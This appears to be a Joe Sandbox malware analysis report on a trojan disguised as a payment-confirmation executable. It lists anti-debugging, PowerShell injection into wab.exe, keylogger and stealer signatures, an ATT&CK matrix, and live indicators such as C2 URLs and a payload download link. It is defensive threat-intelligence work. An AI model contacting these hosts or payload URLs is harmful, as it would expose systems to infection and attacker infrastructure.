      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02E7D6E0 LdrInitializeThunk,LdrInitializeThunk,2_2_02E7D6E0
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F2FF7CJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
      Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      111
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Query Registry
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Disable or Modify Tools
      LSASS Memory321
      Security Software Discovery
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)141
      Virtualization/Sandbox Evasion
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
      Process Injection
      NTDS141
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync2
      File and Directory Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem115
      System Information Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Confirmation transfer Note AGS # 22-00379.exe50%ReversingLabsWin32.Trojan.Generic
      Confirmation transfer Note AGS # 22-00379.exe58%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe50%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe58%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLink
      www.reap.skyestates.com.mt0%VirustotalBrowse
      checkip.dyndns.com0%VirustotalBrowse
      checkip.dyndns.org0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://checkip.dyndns.org/0%URL Reputationsafe
      http://crl.micro0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://aka.ms/pscore6lB0%URL Reputationsafe
      https://aka.ms/pscore6lB0%URL Reputationsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
      http://aborters.duckdns.org:8081100%Avira URL Cloudmalware
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://upx.sf.net0%URL Reputationsafe
      http://checkip.dyndns.org0%URL Reputationsafe
      http://checkip.dyndns.com0%URL Reputationsafe
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://checkip.dyndns.comd0%Avira URL Cloudsafe
      http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
      http://checkip.dyndns.orgd0%Avira URL Cloudsafe
      https://www.reap.skyestates.com.mt/0%Avira URL Cloudsafe
      http://aborters.duckdns.org:808112%VirustotalBrowse
      http://crl.microw0%Avira URL Cloudsafe
      http://varders.kozow.com:80810%Avira URL Cloudsafe
      https://github.com/Pester/Pester0%Avira URL Cloudsafe
      http://anotherarmy.dns.army:808115%VirustotalBrowse
      https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin0%Avira URL Cloudsafe
      https://github.com/Pester/Pester1%VirustotalBrowse
      https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin3%VirustotalBrowse
      http://varders.kozow.com:808115%VirustotalBrowse
      https://www.reap.skyestates.com.mt/0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.reap.skyestates.com.mt
      108.167.181.251
      truefalseunknown
      checkip.dyndns.com
      158.101.44.242
      truefalseunknown
      checkip.dyndns.org
      unknown
      unknownfalseunknown
      NameMaliciousAntivirus DetectionReputation
      http://checkip.dyndns.org/false
      • URL Reputation: safe
      unknown
      https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.binfalse
      • 3%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://aborters.duckdns.org:8081wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmptrue
      • 12%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.micropowershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://checkip.dyndns.comdwab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://anotherarmy.dns.army:8081wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpfalse
      • 15%, Virustotal, Browse
      • Avira URL Cloud: malware
      unknown
      https://contoso.com/powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://contoso.com/Licensepowershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://contoso.com/Iconpowershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://checkip.dyndns.orgdwab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://www.reap.skyestates.com.mt/wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://upx.sf.netAmcache.hve.18.drfalse
      • URL Reputation: safe
      unknown
      http://checkip.dyndns.orgwab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.000000002201C000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://checkip.dyndns.comwab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://nsis.sf.net/NSIS_ErrorErrorConfirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.drfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://crl.microwpowershell.exe, 00000002.00000002.1630220347.000000000754A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://varders.kozow.com:8081wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmpfalse
      • 15%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmpfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      108.167.181.251
      www.reap.skyestates.com.mtUnited States
      46606UNIFIEDLAYER-AS-1USfalse
      158.101.44.242
      checkip.dyndns.comUnited States
      31898ORACLE-BMC-31898USfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1481030
      Start date and time:2024-07-25 03:08:48 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 42s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:24
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Confirmation transfer Note AGS # 22-00379.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@7/16@2/2
      EGA Information:
      • Successful, ratio: 33.3%
      HCA Information:
      • Successful, ratio: 89%
      • Number of executed functions: 89
      • Number of non-executed functions: 41
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 20.189.173.22
      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target powershell.exe, PID 424 because it is empty
      • Execution Graph export aborted for target wab.exe, PID 7476 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      TimeTypeDescription
      21:09:42API Interceptor40x Sleep call for process: powershell.exe modified
      23:07:28API Interceptor1x Sleep call for process: WerFault.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      108.167.181.251List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
        Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
          odemePlani.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
            #91139_C050.exeGet hashmaliciousAzorult, GuLoaderBrowse
              BSX#24001602.exeGet hashmaliciousAzorult, GuLoaderBrowse
                158.101.44.242rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • checkip.dyndns.org/
                rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • checkip.dyndns.org/
                Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                KQtHehIECg.exeGet hashmaliciousSnake KeyloggerBrowse
                • checkip.dyndns.org/
                Bank Slip.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • checkip.dyndns.org/
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                checkip.dyndns.comDeye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                • 132.226.247.73
                rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                • 158.101.44.242
                z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 158.101.44.242
                rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                • 158.101.44.242
                SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 132.226.247.73
                Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 132.226.247.73
                SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                • 132.226.8.169
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                • 193.122.6.168
                Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                • 132.226.247.73
                www.reap.skyestates.com.mtList & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 108.167.181.251
                Apixaban - August 2024.XLS.exeGet hashmaliciousSnake KeyloggerBrowse
                • 108.167.181.251
                odemePlani.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • 108.167.181.251
                #91139_C050.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • 108.167.181.251
                BSX#24001602.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • 108.167.181.251
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                UNIFIEDLAYER-AS-1UShttps://mail.tekdecoracoes.com.br/don/upload/en.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=&.rand=13InboxLight.aspx?n=1774256418&fid=4Get hashmaliciousUnknownBrowse
                • 162.241.63.57
                http://links-sg.dispatch.me/ls/click?upn=u001.ocQe0-2BgliqpF-2FIgZypM8KOaLflKjBlvqTxtPZw5yZIbZDE9vmulRwrCjHKmWRDNHjHXGC5bjX16p-2FKQbudETcReyH2ada0TDTZ9i4Fm9kQ3GWUyvzzwMCdcEUqs-2FTSCobKxgzuisHVBsQ-2FSQ3F13H5HutCQALtWrS8HApt5o4dpZ-2BNvuOuxFwx-2BeObsn6VjvT5TqPLkexi4iH5KEJi8Cdw-3D-3DATrr_-2F-2F-2B-2FxnH7VwZ7l1bJN-2FhVOPk1U24fPXiT0lCeCqmBBxzunHzzBZhASjEPhdfcYmgfhvKPgbmfCcNO0asuCAP4GQjxIDFltQt0zztHT0pZkzXqKtFgdxgdlGrzT0WJ21THn3P5UyhAiKGRx3slicqJyrWBw4wmTjosxdLpPvzT9mOZ9tFtj-2FYpdJbLEVcqfFG3PWdvMJHnhRGcQ-2BjkZifTwg-3D-3DGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                • 108.179.241.225
                Transaction record 5445-97660.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                • 69.49.245.172
                Transaction record 5445-97660.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                • 69.49.245.172
                7Y18r(143).exeGet hashmaliciousUpatreBrowse
                • 50.87.60.178
                securedoc_20240724T165428.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                • 69.49.245.172
                https://u45839844.ct.sendgrid.net/ls/click?upn=u001.DllELGnMN-2FgwhPuw-2Bw-2BNgnmCFrfnsrctB8UQDAzNXZjNxpXpR2XKCBH3KthzekeYjaQbAA5LVcSujhMLVBWSnb2uqKjideDrmtYjteyHbcY-3DVOSG_eH7kZOEBJckm0lbfavKeEjXQgDcXEoTs4hlXzovVib9ds-2F8T92pqONkaTjg8DIkzupCO8NGtXqlMZORh0VZrRebaYQDw-2F1cs5cZjQ3jKjnAbQSx6JHPZK1-2F-2Fim0iGhiJRpXS6CHLx2XY2QhyuOQPi1BQNckNSrlGnSo7tfNz-2FxLDU3SSyPj0JdUOc8e0dUZYwAsbzZEsHLw-2BsqGT9chBpfiKB7hSzPykCsWC3EnYNmGZXURKkY9cgFlX1wiFMuvEj1REXgr7jFKZfJeau8BuLIsBDEBB-2BSoYK-2BycEZ38w7bCu3IQro31ke-2FAq552arUSFCi2TKQJQbpRwV6wPpGIs8IoqSrpuMw1ckBevCdjFAGXvbVOwe-2B7ojm5NPUPfO28yeCN37VpJ6C-2Fy-2ByuFcAeHd0ltdClYFVsrlLry5vSoVoMBxOXyION2UWcfwbT1J08TpTRcrl2WJmakRx3o1eJ30Rj5nuZyBG3dTZU4osRARY4Ei-2Ba-2F78IkgHV6qqnFiCC00dgTWTaTSAFSz5SIHRu6ppjaFaGzM0I0-2FCIYXBT-2BRzqQZUh-2FAuxfn1vfL9Ofh8Ez-2Fh2cqCwHTWqaCiOUZX-2B7g-3D-3D#john@steinborn.comGet hashmaliciousHTMLPhisherBrowse
                • 192.185.193.215
                rRSFREVISEDINVOICE.exeGet hashmaliciousGuLoaderBrowse
                • 69.49.244.149
                rRSFREVISEDINVOICE.exeGet hashmaliciousGuLoaderBrowse
                • 69.49.244.149
                231210-01-AgentTesla-2eba02.exeGet hashmaliciousAgentTeslaBrowse
                • 50.87.139.143
                ORACLE-BMC-31898UScounter.exeGet hashmaliciousBdaejecBrowse
                • 158.101.87.161
                rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                • 158.101.44.242
                z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 158.101.44.242
                rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                • 158.101.44.242
                SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 158.101.44.242
                Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 193.122.130.0
                SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                • 158.101.44.242
                List & Sample_Doc3.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 158.101.44.242
                Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 193.122.6.168
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19LisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                • 108.167.181.251
                LisectAVT_2403002A_270.exeGet hashmaliciousBlackMoonBrowse
                • 108.167.181.251
                tGnix5uKlr.exeGet hashmaliciousUnknownBrowse
                • 108.167.181.251
                LisectAVT_2403002A_187.exeGet hashmaliciousCobaltStrikeBrowse
                • 108.167.181.251
                tGnix5uKlr.exeGet hashmaliciousUnknownBrowse
                • 108.167.181.251
                FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                • 108.167.181.251
                FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exeGet hashmaliciousBdaejecBrowse
                • 108.167.181.251
